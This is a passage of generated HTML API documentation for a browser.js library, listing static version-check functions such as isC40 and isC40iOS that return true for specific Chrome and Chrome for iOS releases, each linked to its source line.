<h4 class="name" id=".isC39iOS"><span class="type-signature">(static) </span>isC39iOS<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome for iOS 39.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line1469">line 1469</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC40"><span class="type-signature">(static) </span>isC40<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome 40.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line1477">line 1477</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC40iOS"><span class="type-signature">(static) </span>isC40iOS<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome for iOS 40.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line1485">line 1485</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC41"><span class="type-signature">(static) </span>isC41<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome 41.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line1493">line 1493</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC41iOS"><span class="type-signature">(static) </span>isC41iOS<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome for iOS 41.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line1501">line 1501</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC42"><span class="type-signature">(static) </span>isC42<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome 42.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line1509">line 1509</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC42iOS"><span class="type-signature">(static) </span>isC42iOS<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome for iOS 42.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line1517">line 1517</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC43"><span class="type-signature">(static) </span>isC43<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome 43.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line1525">line 1525</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC43iOS"><span class="type-signature">(static) </span>isC43iOS<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome for iOS 43.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line1533">line 1533</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC44"><span class="type-signature">(static) </span>isC44<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome 44.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line1541">line 1541</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC44iOS"><span class="type-signature">(static) </span>isC44iOS<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome for iOS 44.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line1549">line 1549</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC45"><span class="type-signature">(static) </span>isC45<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome 45.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line1557">line 1557</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC45iOS"><span class="type-signature">(static) </span>isC45iOS<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome for iOS 45.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line1565">line 1565</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC46"><span class="type-signature">(static) </span>isC46<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome 46.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line1573">line 1573</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC46iOS"><span class="type-signature">(static) </span>isC46iOS<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome for iOS 46.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line1581">line 1581</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC47"><span class="type-signature">(static) </span>isC47<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome 47.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line1589">line 1589</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC47iOS"><span class="type-signature">(static) </span>isC47iOS<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome for iOS 47.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line1597">line 1597</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC48"><span class="type-signature">(static) </span>isC48<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome 48.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line1605">line 1605</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC48iOS"><span class="type-signature">(static) </span>isC48iOS<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome for iOS 48.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line1613">line 1613</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC49"><span class="type-signature">(static) </span>isC49<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome 49.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line1621">line 1621</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC49iOS"><span class="type-signature">(static) </span>isC49iOS<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome for iOS 49.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line1629">line 1629</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC50"><span class="type-signature">(static) </span>isC50<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome 50.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line1637">line 1637</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC50iOS"><span class="type-signature">(static) </span>isC50iOS<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome for iOS 50.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line1645">line 1645</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC51"><span class="type-signature">(static) </span>isC51<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome 51.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line1653">line 1653</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC51iOS"><span class="type-signature">(static) </span>isC51iOS<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome for iOS 51.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line1661">line 1661</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC52"><span class="type-signature">(static) </span>isC52<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome 52.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line1669">line 1669</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC52iOS"><span class="type-signature">(static) </span>isC52iOS<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome for iOS 52.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line1677">line 1677</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC53"><span class="type-signature">(static) </span>isC53<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome 53.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line1685">line 1685</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC53iOS"><span class="type-signature">(static) </span>isC53iOS<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome for iOS 53.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line1693">line 1693</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC54"><span class="type-signature">(static) </span>isC54<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome 54.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line1701">line 1701</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC54iOS"><span class="type-signature">(static) </span>isC54iOS<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome for iOS 54.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line1709">line 1709</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC55"><span class="type-signature">(static) </span>isC55<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome 55.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line1717">line 1717</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC55iOS"><span class="type-signature">(static) </span>isC55iOS<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome for iOS 55.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line1725">line 1725</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC56"><span class="type-signature">(static) </span>isC56<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome 56.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line1733">line 1733</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC56iOS"><span class="type-signature">(static) </span>isC56iOS<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome for iOS 56.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line1741">line 1741</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC57"><span class="type-signature">(static) </span>isC57<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome 57.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line1749">line 1749</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC57iOS"><span class="type-signature">(static) </span>isC57iOS<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome for iOS 57.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line1757">line 1757</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC58"><span class="type-signature">(static) </span>isC58<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome 58.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line1765">line 1765</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC58iOS"><span class="type-signature">(static) </span>isC58iOS<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome for iOS 58.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line1773">line 1773</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC59"><span class="type-signature">(static) </span>isC59<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome 59.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line1781">line 1781</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC59iOS"><span class="type-signature">(static) </span>isC59iOS<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome for iOS 59.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line1789">line 1789</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC60"><span class="type-signature">(static) </span>isC60<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome 60.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line1797">line 1797</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC60iOS"><span class="type-signature">(static) </span>isC60iOS<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome for iOS 60.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line1805">line 1805</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC61"><span class="type-signature">(static) </span>isC61<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome 61.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line1813">line 1813</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC61iOS"><span class="type-signature">(static) </span>isC61iOS<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome for iOS 61.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line1821">line 1821</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC62"><span class="type-signature">(static) </span>isC62<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome 62.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line1829">line 1829</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC62iOS"><span class="type-signature">(static) </span>isC62iOS<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome for iOS 62.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line1837">line 1837</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC63"><span class="type-signature">(static) </span>isC63<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome 63.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line1845">line 1845</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC63iOS"><span class="type-signature">(static) </span>isC63iOS<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome for iOS 63.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line1853">line 1853</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC64"><span class="type-signature">(static) </span>isC64<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome 64.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line1861">line 1861</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC64iOS"><span class="type-signature">(static) </span>isC64iOS<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome for iOS 64.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line1869">line 1869</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC65"><span class="type-signature">(static) </span>isC65<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome 65.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line1877">line 1877</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC65iOS"><span class="type-signature">(static) </span>isC65iOS<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome for iOS 65.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line1885">line 1885</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC66"><span class="type-signature">(static) </span>isC66<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome 66.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line1893">line 1893</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC66iOS"><span class="type-signature">(static) </span>isC66iOS<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome for iOS 66.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line1901">line 1901</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC67"><span class="type-signature">(static) </span>isC67<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome 67.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line1909">line 1909</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC67iOS"><span class="type-signature">(static) </span>isC67iOS<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome for iOS 67.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line1917">line 1917</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC68"><span class="type-signature">(static) </span>isC68<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome 68.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line1925">line 1925</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC68iOS"><span class="type-signature">(static) </span>isC68iOS<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome for iOS 68.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line1933">line 1933</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC69"><span class="type-signature">(static) </span>isC69<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome 69.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line1941">line 1941</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC69iOS"><span class="type-signature">(static) </span>isC69iOS<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome for iOS 69.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line1949">line 1949</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC70"><span class="type-signature">(static) </span>isC70<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome 70.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line1957">line 1957</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC70iOS"><span class="type-signature">(static) </span>isC70iOS<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome for iOS 70.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line1965">line 1965</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC71"><span class="type-signature">(static) </span>isC71<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome 71.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line1973">line 1973</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC71iOS"><span class="type-signature">(static) </span>isC71iOS<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome for iOS 71.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line1981">line 1981</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC72"><span class="type-signature">(static) </span>isC72<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome 72.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line1989">line 1989</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC72iOS"><span class="type-signature">(static) </span>isC72iOS<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome for iOS 72.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line1997">line 1997</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC73"><span class="type-signature">(static) </span>isC73<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome 73.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line2005">line 2005</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC73iOS"><span class="type-signature">(static) </span>isC73iOS<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome for iOS 73.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line2013">line 2013</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC74"><span class="type-signature">(static) </span>isC74<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome 74.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line2021">line 2021</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC74iOS"><span class="type-signature">(static) </span>isC74iOS<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome for iOS 74.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line2029">line 2029</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC75"><span class="type-signature">(static) </span>isC75<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome 75.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line2037">line 2037</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC75iOS"><span class="type-signature">(static) </span>isC75iOS<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome for iOS 75.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line2045">line 2045</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC76"><span class="type-signature">(static) </span>isC76<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome 76.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line2053">line 2053</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC76iOS"><span class="type-signature">(static) </span>isC76iOS<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome for iOS 76.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line2061">line 2061</a>
</li></ul></dd>
